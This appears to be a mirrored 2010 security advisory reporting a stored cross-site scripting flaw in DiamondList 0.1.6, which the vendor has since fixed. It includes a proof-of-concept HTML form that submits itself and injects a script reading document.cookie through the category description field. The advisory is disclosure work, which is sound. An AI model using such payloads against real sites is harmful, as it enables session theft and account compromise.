Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24411
HistoryAug 08, 2010 - 12:00 a.m.

XSS vulnerability in DiamondList

2010-08-0800:00:00
vulners.com
10

Vulnerability ID: HTB22518
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_diamondlist_1.html
Product: DiamondList
Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/diamondlist )
Vulnerable Version: 0.1.6 and Probably Prior Versions
Vendor Notification: 22 July 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "user/main/update_category" script to properly sanitize user-supplied input in "category[description]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/user/main/update_category/CATEGORY_ID&quot; method="post" name="main" >
<input type="hidden" name="category[name]" value="some cat name" />
<input type="hidden" name="category[description]" value='descr<script>alert(document.cookie)</script>' />
<input type="hidden" name="commit" value="Update" />

</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version